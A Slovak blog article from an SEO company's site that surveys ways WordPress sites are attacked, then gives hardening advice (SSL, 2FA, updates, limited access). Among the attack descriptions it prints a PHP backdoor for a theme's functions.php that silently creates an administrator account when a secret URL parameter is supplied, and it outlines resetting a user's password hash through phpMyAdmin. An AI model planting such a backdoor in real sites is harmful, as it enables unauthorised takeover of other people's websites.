• WordPress

Ako hacknúť WordPress?

  • Felix Rose-Collins
  • 8 min read
Ako hacknúť WordPress?

Úvod

Pred začatím tohto článku by sme vás chceli upozorniť, že hacking je nezákonný a my nemotivujeme ani nepodporujeme žiadne škodlivé aktivity. Tento článok slúži výlučne na získanie poznatkov o tom, ako podvodníci pracujú a ako sú rôzne metódy zabezpečenia stránok nevyhnutné na to, aby ste ich udržali na uzde. Poďme diskutovať:

  • Ako podvodníci hacknú WordPress?
  • Ako zabezpečiť svoju stránku WP pred podvodníkmi?

Takže bez ďalších slov začnime s témou.

Ako hacknúť webovú stránku WordPress online?

How to Hack WordPress Website Online (Zdroj: wpsecurityninja.com)

Používanie WPScan:

WPScan je skener zabezpečenia WP, ktorý pomáha majiteľom stránok kontrolovať ich stránky WordPress na zraniteľnosti, ale tento skener využívajú aj hackeri na plnenie svojich motívov na hacknutie webových stránok.

WPScan umožňuje majiteľom a správcom stránok zadávať používateľské účty WP a heslá hrubou silou a sú hlavným krokom pri získavaní neoprávneného prístupu k účtom WP.

Brute force username and password using WPScan (Brute force používateľského mena a hesla pomocou WPScan. Zdroj: Medium)

Útoky MIM:

Útoky typu Man-in-middle (MIM) možno ľahko vykonať v prípade používateľov, ktorí používajú podobné siete LAN. Nešifrované prihlásenia používateľov sú ľahkým cieľom, pretože všetky údaje sú viditeľné v obyčajnom texte.

Softvér, ktorý sa podieľa na týchto typoch útokov, dokáže odhaliť ohrozené témy, zásuvné moduly a dokáže vymenovať používateľov.

MIM Attacks (Zdroj: Medium)

Injekcie SQL:

Útoky SQL injection sa považujú za najvýznamnejšie útoky používané na prenikanie do webových stránok. Tieto útoky sa zameriavajú na backendové brány webovej lokality a umožňujú hackerom preniknúť do nich implementáciou kompromitujúcich príkazov.

SQL Injections (Zdroj: secure.wphackedhelp.com)

Zoznámte sa s nástrojom Ranktracker

Platforma "všetko v jednom" pre efektívne SEO

Za každým úspešným podnikaním stojí silná kampaň SEO. Pri nespočetnom množstve optimalizačných nástrojov a techník, z ktorých si môžete vybrať, však môže byť ťažké zistiť, kde začať. No už sa nemusíte báť, pretože mám pre vás presne to, čo vám pomôže. Predstavujem komplexnú platformu Ranktracker na efektívne SEO

Konečne sme otvorili registráciu do nástroja Ranktracker úplne zadarmo!

Vytvorenie bezplatného konta

Alebo sa pri hláste pomocou svojich poverení

Tieto prieniky tiež umožňujú hackerom upravovať databázy a príkazy a odstraňovať alebo kradnúť informácie o lokalite.

Keďže tieto útoky SQL si všímajú zraniteľné a nezáplatované stránky, uľahčujú hackerskú úlohu a robia ju úspešnou.

Využitie My SQL/cPanel:

Pri tejto metóde hackeri vytvoria falošné konto alebo zmenia heslo aktuálneho používateľa stránky WP. Hackeri sa pokúšajú preniknúť cez panel cPanel otvorením aplikácie PhpMyAdmin. Hľadajú tabuľku s koncovkou _users a nájdu používateľa, ktorého chcú upraviť.

To im umožní zmeniť prihlasovacie údaje používateľa, ktorého plánujú hacknúť. Vyhľadajú používateľa a zmenia jeho heslo (z poľa user_pass) tak, že otvoria online generátor MD5, nahradia ho požadovaným a neskôr kliknú na tlačidlo #.

Utilizing My SQL/cPanel (Používateľské mená, heslá používateľov, ich e-mailové ID atď. sú uložené v tabuľke databázy wp_users. Zdroj: firstsiteguide.com)

Používateľské mená, heslá používateľov, ich e-mailové ID atď. sú uložené v tabuľke databázy wp_users.

Úprava súboru Functions.php:

Hackeri majú prístup aj do panela cPanel, kde môžu upraviť súbor Functions.php. Odomknutím správcu súborov vyhľadajú priečinok aktívnej témy. Z priečinka public_html/wp_content/themes vysledujú tému a upravia súbor functions.php umiestnením svojho kompromitovaného kódu. Hacking je už v procese, pretože hackeri vytvorili nové konto. Po dokončení kompromitovaný kód vymažú.

Vytvorenie nového používateľského konta prostredníctvom FTP:

Všeobecne platí, že účty FTP pomáhajú majiteľom stránok vytvárať adresáre na ich stránkach, ktoré umožňujú konkrétnym používateľom nahrávať/ sťahovať súbory pomocou ich prihlasovacích údajov.

Tieto súbory si môžete prezerať aj na internete.

Kroky na vytvorenie konta FTP na webe:

  • Zadajte požadované údaje
  • Zadajte používateľské meno nového používateľa FTP
  • Zadajte heslo pre pridelenie účtu pre prístup cez FTP
  • Zadajte názov adresára, ku ktorému chcete získať prístup prostredníctvom FTP
  • Napíšte požadovaný priestor MB, ktorý chcete prideliť tomuto priečinku
  • Neskôr stlačením tlačidla "Vytvoriť" vytvorte nové konto.

Aby nový používateľ získal prístup cez FTP, musí načítať nižšie uvedené údaje.


Adresa / Názov hostiteľa / Adresa: yourdomain.com alebo ftp.yourdomain.com Používateľ / Používateľ: user@yourdomain.com Heslo: El heslo pridelené tomuto kontu FTP

Port: 21Názov priečinka na nahrávanie/preberanie súborov.


Nový používateľ bude mať práva na čítanie a zápis do zvoleného adresára aj do všetkých podadresárov, ktoré obsahuje. Ak napríklad vytvoríte používateľa klienta a dáte mu prístup do adresára / home / user / public_html

Prenikanie cez zadné dvierka:

Zlomyseľný spôsob preniknutia na stránku je cez zadné vrátka. Či už ide o podvodníka, ktorý chce získať prístup na vašu lokalitu, alebo o používateľa obete, ktorý chce získať prístup na svoju lokalitu prostredníctvom vstupu backdoor, obaja musia postupovať podľa nižšie uvedených krokov.

Zoznámte sa s nástrojom Ranktracker

Platforma "všetko v jednom" pre efektívne SEO

Za každým úspešným podnikaním stojí silná kampaň SEO. Pri nespočetnom množstve optimalizačných nástrojov a techník, z ktorých si môžete vybrať, však môže byť ťažké zistiť, kde začať. No už sa nemusíte báť, pretože mám pre vás presne to, čo vám pomôže. Predstavujem komplexnú platformu Ranktracker na efektívne SEO

Konečne sme otvorili registráciu do nástroja Ranktracker úplne zadarmo!

Vytvorenie bezplatného konta

Alebo sa pri hláste pomocou svojich poverení

V prípadoch, keď je vytvorený nový používateľský účet prostredníctvom FTP alebo je vykonaná obnova hesla, ale neprináša to požadované výsledky, používateľ môže chcieť hacknúť svoje stránky prostredníctvom zadných dverí a získať svoj prístup správcu.

Kroky na vytvorenie zadných dverí:

  • Otvorte súbor functions.php a vložte nižšie uvedený kód.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Neskôr uložte zmeny.

Ťažba kryptomien a crypto jacking:

Popularita kryptomien spôsobila vznik nových kybernetických hrozieb, ako je napríklad crypto-jacking, ktorý sa označuje aj ako malvér na ťažbu kryptomien.

Čin, ktorý spočíva v zabavení počítača proti vôli používateľa, ako aj proti jeho vedomiu, sa nazýva crypto-jacking. V prípade malvéru crypto-jacking podvodníci infikujú počítač používateľa škodlivým malvérom dodávaným prostredníctvom softvéru na kompromitáciu systémov a sietí.

Phishing:

Phishing je metóda, pri ktorej podvodníci od používateľov odcudzujú ich citlivé údaje (prihlasovacie údaje, číslo sociálneho účtu, PIN, údaje o kreditnej karte atď.) tým, že sa vydávajú za právnické osoby. Na splnenie svojho cieľa sa zvyčajne uchyľujú k e-mailom.

Príklad: Podvodník sa môže vydávať za dôveryhodný zdroj a zhromažďovať osobné údaje používateľov, aby splnil svoje želania. Do phishingového e-mailu môže tiež umiestniť zlý odkaz a nasmerovať ich na nejakú podvodnú stránku, aby im doručil malvér.

Škodlivý softvér:

Bezpečnostné štatistiky WordPress uvádzajú, že 4000 webových stránok WP je infikovaných malvérom kvôli falošným SEO pluginom.

Podvodníci nepotrebujú zdroj na doručenie škodlivého softvéru. SEO pluginy, témy WP a mnohé ďalšie faktory prítomné na stránke motivovali hackerov k použitiu nedávneho malvéru WP-VCD.

Dokonca aj phishingové e-maily sú vstupnou bránou na doručenie škodlivého softvéru.

Aj v tomto prípade je motto hackerov rovnaké, t. j. získať citlivé údaje od používateľov preniknutím do systémov a krádežou informácií.

Ransomvér WordPress:

V prípade ransomvéru WP hackeri používajú škodlivý softvér na zablokovanie prístupu používateľov k systémom a sieťam. Ten môže používateľ obnoviť zaplatením výkupného, ktoré požaduje hacker.

Príklad: pri ktorom hacker zašifruje vaše súbory a údaje a požaduje výkupné za dešifrovací kľúč.

Útok XSS (Cross-Site Scripting):

Útoky XSS vykonávajú hackeri tak, že do webovej stránky vložia škodlivý obsah, čím zneužijú prehliadač. Tento útok umožňuje hackerovi ukradnúť údaje zo súborov cookie, upraviť obsah stránky a zmocniť sa webovej stránky s cieľom získať citlivé údaje.

Clickjacking:

Pri clickjackingu sa hacker pokúsi škodlivým spôsobom kompromitovať tlačidlo/odkaz a motivuje používateľa, aby klikol na kompromitovaný objekt. To umožní hackerovi vykonať škodlivé príkazy na získanie prístupu k citlivým údajom používateľa.

Spoofing:

Spoofing je útok, pri ktorom sa osoba vydáva za dôveryhodnú identitu, aby získala nezákonný prospech na používateľovi a podviedla ho, aby poskytol svoje dôverné informácie.

Aby ste zabránili všetkým týmto hackerským útokom, je potrebné prijať špecifické bezpečnostné opatrenia na zabezpečenie vašej webovej lokality WP.

Ako zabezpečiť webové stránky WordPress pred hackermi?

How to Secure WordPress Website from Hacking? (Zdroj: envisagedigital.co.uk)

Vyššie uvedené štatistiky dostatočne poukazujú na popularitu WordPress. Práve táto popularita spôsobuje, že táto platforma CMS je vyhľadávanejšia medzi hackermi, ktorí skúšajú rôzne metódy hackingu, aby získali prístup k webovým stránkam WP a ich údajom.

Preto je dôležité vedieť, ako zabrániť hackerom v prístupe na vašu stránku WP.

Zabezpečte svoje stránky WP pomocou certifikátu SSL:

Keď sa na lokalite načítajú akékoľvek údaje, sú vždy v obyčajnom texte, ktorý je ľahko viditeľný pre všetkých vrátane hackerov. To môže byť riskantné, pretože hackeri môžu zneužiť údaje na vašej stránke.

Certifikáty SSL (Secure Socket Layers ) sú digitálne certifikáty, ktoré pomáhajú pri zabezpečení vašej stránky WP 256-bitovým šifrovaním, čím sa údaje na stránke prevedú do kódovaného formátu.

Hackeri nemôžu čítať kódy, hoci získali prístup na vaše stránky, a preto sú nútení takéto stránky opustiť.

Secure your WP site with SSL Certificate (Zdroj: clickssl.net)

Vyberte požadovanú značku certifikátu SSL (Comodo, Thawte, RapidSSL atď.) a nainštalujte ho na svoju stránku WP. V prípade typu certifikátu SSL musíte rozumieť doménam a subdoménam. Ak má napríklad vaša stránka WP subdomény, potom jeden lacný certifikát Wildcard, ktorý stojí približne len 45 USD/rok, môže zabezpečiť celý váš digitálny podnik.

Rýchle vystavenie, 2048-bitové šifrovanie, zvýšenie SEO, pečať dôveryhodnosti webu, 99 % kompatibilita s prehliadačmi/mobilnými zariadeniami, politika vrátenia peňazí a záruka sú niektoré z funkcií a výhod inštalácie certifikátov SSL Wildcard.

Rôzne značky a možnosti produktov SSL, cenovo výhodné ceny a vynikajúci zákaznícky servis sú niektoré z výhod, ktoré vám prinesie obchod ClickSSL pri zabezpečení vašej stránky WP.

Aktualizujte svojich zamestnancov:

Ľudské chyby môžu mať katastrofálne následky, preto vždy dbajte na to, aby vaši zamestnanci boli informovaní o najnovších kybernetických hrozbách, aby sa nestali zraniteľnými.

Ak vaši zamestnanci dokážu vystopovať podozrivé signály hacknutej webovej stránky v počiatočnej fáze, môžu o tom informovať príslušné orgány a zabrániť ďalším škodám na vašej stránke a v podnikaní.

Používajte dvojfaktorovú autentifikáciu (2FA):

Implementácia 2FA počas prihlasovania na stránku je najdôležitejším spôsobom, ako zabrániť útokom hrubou silou. Okrem toho, že pridávajú ďalšiu vrstvu zabezpečenia, zabraňujú aj zneužitiu údajov o lokalite a používateľoch.

Ak je totiž narušená jedna vrstva zabezpečenia, podvodník musí napadnúť druhú vrstvu, aby získal prístup na webovú lokalitu.

Je to ťažké rozhodnutie, a preto sa vo väčšine prípadov podvodníci nakoniec presunú na iné zle zabezpečené stránky.

Tip: WP 2FA je bezplatný doplnok WP, ktorý poskytuje ďalšiu bezpečnostnú vrstvu pre vašu stránku WP.

Pravidelný audit používateľov administrátora:

Je to dôležité pre bezpečnosť vašej stránky WP. Zabezpečte pravidelný audit používateľov administrátora a krížovú kontrolu ich prístupov.

Zabezpečte tiež, aby používatelia a zamestnanci mali obmedzený prístup podľa svojich úloh, aby ste predišli bezpečnostným chybám.

Pravidelne aktualizujte jadro WordPress:

Neviete o WP Core?

Dovoľte mi, aby som vás stručne informoval, že jadro WP obsahuje všetky základné súbory potrebné na fungovanie WP.

Zoznam súborov v súbore WP zip stiahnutom zo stránky WordPress.org

Update WordPress Core Regularly (Zdroj: ithemes.com)

Tieto základné súbory je potrebné pravidelne aktualizovať po vydaní bezpečnostných aktualizácií, aby sa opravili všetky bezpečnostné chyby.

Stiahnite si WP témy a pluginy z dôveryhodných zdrojov:

To je kľúčové, pretože pluginy môžu byť nebezpečné, ak nie sú aktualizované alebo nainštalované z nedôveryhodných zdrojov. V prípade používania bezplatných/platených zásuvných modulov vždy skontrolujte nižšie uvedené faktory, ako napr:

  • Hodnotenia a recenzie používateľov
  • Používateľská prívetivosť
  • Kompatibilita
  • Zabezpečenie
  • Dôveryhodnosť

Download WP Themes & Plugins from Trustworthy Sources (Zdroj: torquemag.io)

Rovnaké pravidlo platí aj pre inštaláciu tém WP.

Pravidelne aktualizujte témy a doplnky WP:

Zastarané alebo neplatné témy a doplnky WP vždy predstavujú hrozbu pre vaše stránky WP, pretože strácajú na svojich bezpečnostných štandardoch. Aby ste zabránili hackerom používať takéto brány na šírenie škodlivého softvéru na získanie prístupu na stránku, zabezpečte pravidelnú aktualizáciu tém a pluginov používaných na vašej stránke WP.

To pomôže pluginu správne fungovať a byť synchronizovaný s najnovšími verziami WP.

Tip: Na stránke so zásuvnými modulmi si môžete zobraziť všetky nainštalované zásuvné moduly a pri každom zásuvnom module odkaz "Zapnúť automatické aktualizácie". Zapnite ho pre automatické aktualizácie.

Upravte predvolené meno správcu:

Hackeri sú príliš inteligentní a môžu ľahko preniknúť do vašej stránky WP pomocou predvoleného mena správcu. Vždy je vhodnejšie upraviť predvolené používateľské meno administrátora, aby ste hackerom zabránili vykonávať útoky hrubou silou na získanie neoprávneného prístupu na vašu webovú stránku.

Udelenie obmedzeného prístupu:

Nikdy nedávajte viac, ako je potrebné, a rovnaké pravidlo platí aj pre udeľovanie prístupu na stránky používateľom aj zamestnancom.

Kontrola prístupu je najdôležitejším pravidlom bezpečnosti webu a údajov, pretože definuje, kto môže alebo nemôže mať prístup na webovú lokalitu. Zablokujte všetky vstupy do administrátora WP a ďalšie kritické kódy a údaje na zabezpečenie webu.

Obmedzený prístup nielenže zvyšuje produktivitu, ale tiež chráni vašu stránku pred škodlivými vstupmi.

Aktualizácia WordPress:

Ak váš WordPress nie je aktualizovaný, hrozí, že vaše stránky napadnú hackeri.

WordPress má 37 % podiel na trhu a pravidelne vydáva aktualizácie na opravu bezpečnostných dier a chýb. Tieto aktualizácie obsahujú aj nové funkcie a vylepšenia existujúcich funkcií, ktoré sú užitočné na zvýšenie výkonu vašich stránok.

Zoznámte sa s nástrojom Ranktracker

Platforma "všetko v jednom" pre efektívne SEO

Za každým úspešným podnikaním stojí silná kampaň SEO. Pri nespočetnom množstve optimalizačných nástrojov a techník, z ktorých si môžete vybrať, však môže byť ťažké zistiť, kde začať. No už sa nemusíte báť, pretože mám pre vás presne to, čo vám pomôže. Predstavujem komplexnú platformu Ranktracker na efektívne SEO

Konečne sme otvorili registráciu do nástroja Ranktracker úplne zadarmo!

Vytvorenie bezplatného konta

Alebo sa pri hláste pomocou svojich poverení

Why you should always update your wordpress (Zdroj: wpbeginner.com)

Udržujte svoju stránku WP aktualizovanú pre spoľahlivé zabezpečenie.

Zhrnutie:

Používajte silné a zložité heslá a udržiavajte svoju stránku WP, ako aj aktualizované pluginy a témy, aby ste odstránili všetky bezpečnostné nedostatky. Venujte čas vzdelávaniu svojich zamestnancov, pretože to vždy pomôže predchádzať katastrofám.

Nikdy sa nepúšťajte do bezpečnosti a vždy sa uistite, že používate najlepšie a dôveryhodné bezpečnostné pluginy, aby bola vaša stránka WP v bezpečí pred zvedavými očami. Okrem toho zabezpečte svoje stránky pomocou protokolu SSL, aby ste zvýšili dôveru zákazníkov, obchod a SEO.

Teraz, keď už viete, ako hackeri fungujú, dúfame, že vám tento článok pomôže zabrániť prenikaniu hackerov na vaše stránky a bezpečne spravovať vaše stránky WP.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Začnite používať Ranktracker... zadarmo!

Zistite, čo brzdí vaše webové stránky v hodnotení.

Vytvorenie bezplatného konta

Alebo sa pri hláste pomocou svojich poverení

Different views of Ranktracker app